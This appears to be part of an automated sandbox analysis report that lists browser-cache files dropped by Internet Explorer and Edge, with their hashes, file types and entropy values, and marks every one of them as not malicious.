                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.a.J.e.g.a.h.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.j.R.j.J.q.U.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2684
                                                                                                                                                                            Entropy (8bit):3.8992170504505963
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:uiTrlKx68Wa7xZxl9Il8uxFO6L0uIUQvgYonEJW0zWsdLRS3Q7d/vc:a3Yn5L0uILgVngQsdLRS39
                                                                                                                                                                            MD5:051BE8ECB1C5C6855F5E9B7D114EBD41
                                                                                                                                                                            SHA1:7765FF9665C2B4487B63ED7F8883193F5CD68B68
                                                                                                                                                                            SHA-256:C3057866C7DAD500EE43B94FBA7C124929D62C18A8C58728C3378FD2E86C9184
                                                                                                                                                                            SHA-512:555902CD14C98666E21A813EE9B5AFF4359835E665DE57E8E6C20DB857F111E56E9A8539EA43AA833806155377765FD4BB77EA10240DA0106149C46FD9C3B9B2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".a.d.s.R.s.X.l.q.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.j.R.j.J.q.U.
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6630
                                                                                                                                                                            Entropy (8bit):7.9537236099118696
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:CSWvHqMVv13qmraixCBnHaL50czYc54Jr7LLcz:dCqq9qmaixQnHaL5z0mer7LLi
                                                                                                                                                                            MD5:93011BFCE422DA1B687766D7F67784DB
                                                                                                                                                                            SHA1:220256C98AE1A8D73690B9A62A7AE908781F71FE
                                                                                                                                                                            SHA-256:D3412A156F0B424627402E8554C564A1843A0B47A81D7C6703A320EB230B6FC3
                                                                                                                                                                            SHA-512:E51C4F9CE5EDB31DF0AD66D3453057D06498606DC3E8C8FE1DD57730CE8EB591D0B1338CA981024602D704B7C25D4C4B638D5DD6B8DB54C1795AB7695E4CA294
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):18737
                                                                                                                                                                            Entropy (8bit):3.264222984888402
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:bSDZ/I09Da01l+gmkyTt6Hk8nTKkEWmUoMAYQxNXrNXNsc5Mt4tCHaZIgr:bSDS0tKg9E05TKk68Ar5btCI
                                                                                                                                                                            MD5:8FCCB64CA012C151FA2F490513AF4E78
                                                                                                                                                                            SHA1:567ECDA93342324A45FC4C84CA0E7243787B0902
                                                                                                                                                                            SHA-256:7A97E24CBCFA529B2781C919396C4E64CA73D6703242193D9B125010D443E07A
                                                                                                                                                                            SHA-512:781A8CE4A791E64BA4E2B3E14EF37820F10A845ACC46DA3413293A49939F0BEC27095FB1A079664617BA76D544047A6708F2EF92A1CF12A2DA6BB88BA5F50795
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):18737
                                                                                                                                                                            Entropy (8bit):3.2627728137161602
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:bSDZ/I09Da01l+gmkyTt6Hk8nTKkEWmHjxNXrNXNsc5MVNkvBs6c3:bSDS0tKg9E05TKk615UNa7G
                                                                                                                                                                            MD5:030939BCC37975289457F6A19A301A35
                                                                                                                                                                            SHA1:89D55A45787FE9DD547BE9CD1D97C9A8F641E338
                                                                                                                                                                            SHA-256:D5D6DF229AC67CDE4B39D275955E4A279BBD7F922855D10B44F5701E6AA3CC64
                                                                                                                                                                            SHA-512:21973881EF4C8EE777A1EA5570418439DB32EEF3B83B1FE468749B5C7669B82B19DF6568531C0155ABA929A2928E88DCDB654E1DE8F3966228C279E91C120E9E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1658
                                                                                                                                                                            Entropy (8bit):7.767837652733948
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:Xw8WI243QHVdjhphUyJsVbMAUBUj1EfDkn4a4gvvJo6fkMah:gE3QHHdwp4AZjNnxvBor
                                                                                                                                                                            MD5:4B45D34DC543DB82D642F2B3DDC4F290
                                                                                                                                                                            SHA1:794CE3CD1E4E29682A7B3F5800ACCFF745DCD738
                                                                                                                                                                            SHA-256:6F36EBC5D76C2B6C03B584DF109CAC2C34222CB86C3DF81A4427C06873756DAE
                                                                                                                                                                            SHA-512:C22280F3CC0F6A5DC6CE9BD74DA4832F0DC3F076098D7A32B5E46EF0E693F59EC77594A878D99837DACAA3ECE59596515A1B9F5709CC06E1646A6CC621B5266E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 1260 x 293, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):39155
                                                                                                                                                                            Entropy (8bit):7.8985187905985486
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:c3+SnZXFurjYW0X0RJ/Dd18i72A/qcQ6Nj2CG+CiTZ2co4IXnmDt:DSnZXFuPSX0f837cQnCG+3WZXmx
                                                                                                                                                                            MD5:E161E2045A32E4513E81954B1D83B953
                                                                                                                                                                            SHA1:0A06306203C286B8C342CFD856C1EE3F16728C7E
                                                                                                                                                                            SHA-256:7A344D69BC6657592E6041F0ED4F53F56ABA90B97EBD94559198B1D059DC7F64
                                                                                                                                                                            SHA-512:7C7E5C2D2A0DF749BB4B52F2E8042829AE8ADD4F242674E13C14FEC436E56D7B173318D8408DD5A33462D38BC1FD2AD932B2060994B5A0C46F4B4BA89922437F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):99184
                                                                                                                                                                            Entropy (8bit):5.371313598276443
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:el/GeOSQz467qAwAzaczzuCt1jnX/IGyjAhgxGA3VA6AZPLWLQL3e1Hh5IkuF3n4:eDczuwbOjteJe1HkkuReh/D0yco9uL1K
                                                                                                                                                                            MD5:B701998A778019A0CA7859A2F2D5CE80
                                                                                                                                                                            SHA1:50B21CC474A3857689CA3E7548D08572FF1E77D4
                                                                                                                                                                            SHA-256:760F71D3C99CE2F3C3E1B598B75F57E73DC2148E71E5975E8B4945D89D8F291B
                                                                                                                                                                            SHA-512:42135971DF8F94E7B2314191C2B5668CC32C583A64185DED76BE3FCF67532B11DA90A73AC589DCAA904DA1EB04189F78D1DAFE0D65D2B14E86710ADFA3242797
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"nextPageUrl":"https://api.msn.com:443/msn/Feed/me?$top=32&delta=True&session=925e1e92-229e-406c-801f-97b7ff304f70&$filter=_t eq 'CompositeCard'&contentType=article,video,slideshow,link,content360&infopaneCount=24&queryType=myfeed&location=47.7159|-122.204&ocid=msndl&apikey=Io4orNtwRr08vQQBER8stWzJbGltMJzMwkmiMOv9z3&activityId=7FF05383-E874-420B-A4A9-263700520B95&responseSchema=cardview&cm=en-us&timeOut=1000&WrapOData=false&DisableTypeSerialization=true","subCards":[{"type":"infopane","subCards":[{"id":"AA1vCYHB","type":"article","title":"Swimsuit model reports Joe Burrow.s home burglary amid growing trend of athlete break-ins","abstract":"Swimsuit model reports Joe Burrow.s home burglary amid growing trend of athlete break-ins - Swimsuit model Olivia Ponton discovered the break-in at Ohio home of NFL quarterback while he was playing Monday Night Football game in Texas","readTimeMin":3,"url":"https://www.independent.co.uk/news/world/americas/crime/joe-burrow-home-burglary-trend-b2
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):14016
                                                                                                                                                                            Entropy (8bit):7.958390314360039
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:SEO/x9pveztMKETqWS/iYB8KlneyLWmdEoO+jEbPky2O:SEMx9BeweWSqo8KleZMrzMPky2O
                                                                                                                                                                            MD5:0A531DE5668D46E99E01400C19B91758
                                                                                                                                                                            SHA1:FE8E7BABC9BEA24CE8A40447AE686E457CB1A3E3
                                                                                                                                                                            SHA-256:3AC15E63EDECE6889C3D53EED4D03A63F3A8C069352FD308A4A819C42BE75B87
                                                                                                                                                                            SHA-512:7D89A9EDEEDCEB79583D125B2320EB87961C92E03B1FF9D90DBA335E1D10E4DC61DE08162F8E0CE6A8714E440945ED8C923545B3DDE3EAE606FA45D67876A9E5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16567
                                                                                                                                                                            Entropy (8bit):7.96118601347592
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:S3qcqTlscc1OQBZm4rNA/2A9duG/MLPYOlsHlF:S6cqhDfQDHJvjGkLP9+
                                                                                                                                                                            MD5:F477E287537AA7A6EE893204AF8BC0B3
                                                                                                                                                                            SHA1:6FADE5A46276BD2578060327F643D380B5DBE0E7
                                                                                                                                                                            SHA-256:0877E63F0A10CB92373BB70C2D80FC47D79F47539176E4BCC94EE9DD553A4137
                                                                                                                                                                            SHA-512:4C235BEB834A247D626A45F3351E1A133834C708802126BE5D1EFA39530F58DFF00B8888B728971D835B1AFBBEEF196B2BFD937C5E81212E10B4DDF056FBD80B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                            Entropy (8bit):7.863934900060588
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:fRV25vZtjfptCuLfqWk5Q273+ifZUp+0nYMcUsDICj03XkXRQ:f6RZtjRtRWk27j2ww/QICiXS
                                                                                                                                                                            MD5:AB044716080F750834B04DC1B236F171
                                                                                                                                                                            SHA1:3E8B5779E1E6ACB12A18557DD49546CD8A8F7E79
                                                                                                                                                                            SHA-256:057CCECE775CBDDD76E7AEA5F75BDEC26D088F05658ECD7A43EA5EB3BEEC91C3
                                                                                                                                                                            SHA-512:308C2000726F0078D1C9ADF6EB8F8BEAC99FAEE7A4809A20F018C52907F39D90D1CF97130DC260BC7EE63BA90C54214DFA4B7BEB3F861A3D37971E4587B0193F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):5.793028196621775
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:f8E1ZP3gyKv47bCGVhyWIiTm0X6bhBz7MYQjt:f8E1ZEcoWCbhBfMht
                                                                                                                                                                            MD5:40DC5300995B24D5E3CD96837ADE0DE1
                                                                                                                                                                            SHA1:DFC7992361BF314153238C094E67469347EA4587
                                                                                                                                                                            SHA-256:AD6FF5E970ADDE363893C1E7B0D439A7DB0A7F97BCFAC7DC925048ED533B1395
                                                                                                                                                                            SHA-512:78D9B031BC149EE82F979051A909705954AA1A84A468106BAA4EE589031B245C6C1C68FB3ACB375C44B2C0770D904DADC758F1BBAEF545A36350E34472E7D029
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):7.246354402317865
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:f6Hr8LXQ+KuYksKBiSxQJVQ4hubEkktQ0OGpG:f6L8zfKlkNQSAVQ2ub9ol
                                                                                                                                                                            MD5:AC90735149551E78CAAF2087BAB1501B
                                                                                                                                                                            SHA1:8297641624E1C926FB1A2400EC0A0AE0928B9CA5
                                                                                                                                                                            SHA-256:20F68D81730AA830DAE0CEAB684BA5BEDDCF152DC78065A8AABA7C0249F85D13
                                                                                                                                                                            SHA-512:222C5809984744D2871DE45F63A799D6B13C3E8AE55ED8BFF3C15B419D6FDA655B495333597DB0E269356523411A541495C9A16E71B5A721A9ECD88C19EB1C6F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):6.05563961832151
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:fgtM4IdSzYYpk8kdKV1U+jM6BYSubQ9Ht+0ofHVPCczBfxnuEqL+Q:fgw2xp2Q1RM4YSub++7fHUczB5w
                                                                                                                                                                            MD5:5D49B612E63916665850B957BD6D9F19
                                                                                                                                                                            SHA1:4BF028C86E75D05DCE7F25E4AB86ABC6C13FC13A
                                                                                                                                                                            SHA-256:BAF837467C0D22D278B0D12006C8C4B85491B0B78763EB01E217E442364C04FA
                                                                                                                                                                            SHA-512:0078F15143D24F39CF47D16B22C2C11508319517CCE086DF05EDC281DC790BA78FEFF9D6CF9F3373E054EEBB64CE07B05A2D57C327210C588D054737C550DFCB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2709
                                                                                                                                                                            Entropy (8bit):7.256602517819913
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:C/6m11L4knA9WII2/c0yI34Ob3VHUcynE666AoUNLiQ/UJB5mNOL3hTUik9lU12s:CSs6knmWII2/g83HUDnE666AoeEB5mAb
                                                                                                                                                                            MD5:F9F16CA1EE26E81D17F10D606BFE6371
                                                                                                                                                                            SHA1:EA21B386E39166D66ACB63108401DF5F390D50B7
                                                                                                                                                                            SHA-256:B2A18A4DF46B82B849232919F9690A7D0870CD728994DA60F05EF496C420273A
                                                                                                                                                                            SHA-512:027E1CBA9FA8F3D6812694A6F96B17AAF9263A71667F9035F1096A9D33AB0724F217FF375CE16A15D4A3A3FF4FABFC2E0A0341BF9A499161B9027D84F4253887
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (57530), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):194063
                                                                                                                                                                            Entropy (8bit):5.452449720358804
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:eheydBFOGFxiq6C8khsNyh/P9OZ8TixY3:eheyAGFxx6C8hNyhX91OxY3
                                                                                                                                                                            MD5:57B6BB076C03CBFAF8B5C14D3B06E913
                                                                                                                                                                            SHA1:DA5887E26879EDE9D8297C2EBE87DE71CFAB436F
                                                                                                                                                                            SHA-256:68B0456E067FF400C8F4A4C51E98B776E97751B49B089EF0D5DAD700C0DF20A6
                                                                                                                                                                            SHA-512:8A289155478DCF06B5664CBC00950183CC6AEAFC8997167E412B82B6FCC45BA0B0F286BD11838D1CCA2B3A9F3FC355513AB4D46E30FF354AC7FFCB1237781DC9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):265283
                                                                                                                                                                            Entropy (8bit):5.432702885320772
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:HO+vocPfYRFKstyFCeHhyhqGF0/UnwQXXibCU2v/5:HZvoQKkstyFCwVUn9vx
                                                                                                                                                                            MD5:02EC88E0320D0B03E9AD93FA18FA5355
                                                                                                                                                                            SHA1:83005DA9C9298D993A46F928C6456935E171C539
                                                                                                                                                                            SHA-256:7E006A5140AFAC3E1A4682ABEE44BBB4CF76A000E2DE7903B4C50A7FE9D66D63
                                                                                                                                                                            SHA-512:A2B1BDFFAF021320019DD9C29C1F1E643E27B904315E1CF8D5E6BE32D1DFFCDFACF6A496775E9BF3808791C586D634C4FC567429BCAE1E61B0530140FBD2F336
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (62058), with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):231602
                                                                                                                                                                            Entropy (8bit):5.762554862752807
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:Bl4m9Uoyafb1Hjhw3dsrWnQHdiJg7hJ5BjNnaAyGJNyWVzskeUjlWSGu9bCxKYb1:Mm9r0g9KAvyWs7Gb9+Fb1Zzae
                                                                                                                                                                            MD5:3ACCB914F415F2E2C36775D5783CF112
                                                                                                                                                                            SHA1:7CB1F2677020EAFEAF7BFCCF2E15BC7DC45DC758
                                                                                                                                                                            SHA-256:D3722105B5C0D92A3E85ECA10174193CD0AF84DE74586B2EEE991182CFF5AFFE
                                                                                                                                                                            SHA-512:3024450B40BBF7F3482F465BC831E4826543DE5D6A634584AAE7C5EA4B72D8F6E75A675D9371BF92303E051BFF94ACE431A082D8BD5E89CB664FC0DEF41DB19B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4286
                                                                                                                                                                            Entropy (8bit):3.8046022951415335
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                                                                                                                                                            MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                                                                                                                                                            SHA1:1125C45D285C360542027D7554A5C442288974DE
                                                                                                                                                                            SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                                                                                                                                                            SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (65448)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):94707
                                                                                                                                                                            Entropy (8bit):5.407635683386335
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:GSqLAEwLuZAFL1oL3SDk5v1VWkNWPEYydLLnnS+7ySGAEMbiYnRGwVKVt+RFVDh4:GJMCUCuW3WkNtnnDGgGwVKWklyGEQ
                                                                                                                                                                            MD5:AA2BEDDF57312EF1CD312880E2729EBA
                                                                                                                                                                            SHA1:8E53B59585F8C947924355AFDC72A62E27CD001C
                                                                                                                                                                            SHA-256:16933DCF75634F75F0A09A67FB0FF7D9D0556188A888CDD89E05F2D21997BB51
                                                                                                                                                                            SHA-512:64AC2CCE15619DA127C5F1B637BBB39C1EB3DB69DE30FB690863C7390EC0A6D0BA2BEE9B9BC20DFF2B4044D17CED483CE5294E624F792652E8E4E1AD6FFAD4DD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):14619
                                                                                                                                                                            Entropy (8bit):7.9593915952662275
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:S0COUJvjPrlShJmtBQfVWIS9F8kSA8JDrBYDG8n:SgUxjl2rfjS9F8kSA8zKV
                                                                                                                                                                            MD5:3989AEE8618F069561734BCD094FF75F
                                                                                                                                                                            SHA1:797CEFFAFDA894E1C18884D17894B4F4EB2E7B83
                                                                                                                                                                            SHA-256:3C8467B5F35524140394179C227622EC3840B2AB36681F8216B3E3F1CB5C9889
                                                                                                                                                                            SHA-512:7995518958A89A7302C92D4D44355C6BFDA4213451B0533CC7DD3EF458BB96CF575E6BD062F9EB50A8C32B3205E9791B4F5699079413075C9FCC6962E77A66B8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15031
                                                                                                                                                                            Entropy (8bit):7.962135996438192
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:Sq4hdd0WCFkpHGzG36nrA48GReEkjY07pN7QExvnxa:S7d0WqkyagbRi777c
                                                                                                                                                                            MD5:88BB8B392754C363A7A9545C8593B0D2
                                                                                                                                                                            SHA1:21EF5E9152EC95014B65C5DFF4FB9086B17A12FC
                                                                                                                                                                            SHA-256:3748C1C54E750201EEDFAD38D09191AE864931884D753FF622AB43A3121ECAE5
                                                                                                                                                                            SHA-512:40222C62B2C79CE9FE0AC1C77A61E041D54018297785AF89CFC92A73EA7ECCEF7734E5D8C80CD1C8A5A177F3E64B117E3780482ACB4040DB53BDEB334736DB4C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):12529
                                                                                                                                                                            Entropy (8bit):7.951825431513078
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:S7rc7G7cf7MEy/cgT+KwU3yHCnTWpFd5W71ZCGiCEbHYSNsTjnHroAMp2FVO:S7rQwcf7MHP/TWpFDQ1ZWMIukWw
                                                                                                                                                                            MD5:E78F91408E3F5E7ABCC7A84C41E1B18F
                                                                                                                                                                            SHA1:41C630D2F49E39401404442715D4350A5999A993
                                                                                                                                                                            SHA-256:67686D994BF80A8BC36CC359F466970776615B6FE04716688955BEFCA572510B
                                                                                                                                                                            SHA-512:5D90CE910D9F629E4A250F6A315C896EAC894B7276265173B73F69CFED208990BB862F472146F3ED3319952BB98E25371AD897A323EEA627999BF6D8A8FD3CA1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (44387), with NEL line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):194844
                                                                                                                                                                            Entropy (8bit):5.419132326845799
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:oSYgu0Mj/PJ3floxEsQtzbwDZ777/3DwLps0p:oSYguVJvSa5+Z7uOE
                                                                                                                                                                            MD5:1C8B7CFD513B7ECA52BA64947CEE70E4
                                                                                                                                                                            SHA1:6BA3FBE2E7514E981EB68E9A92E9EA7A499CCC0C
                                                                                                                                                                            SHA-256:D1730E14E7E3D2362E6C5FF0C9C36E08660F87317EC44551FAED419263240F2C
                                                                                                                                                                            SHA-512:1F6567D3870CFBE002CD447135020C9F1319DFAB76E3CEAFE4C62BDD79F78F2AB3E5958DE9E068A3937E1C469978FC2E4A56015B82E06FE1377A78B47D1B06DC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3583
                                                                                                                                                                            Entropy (8bit):7.9158821748174555
                                                                                                                                                                            Encrypted:false
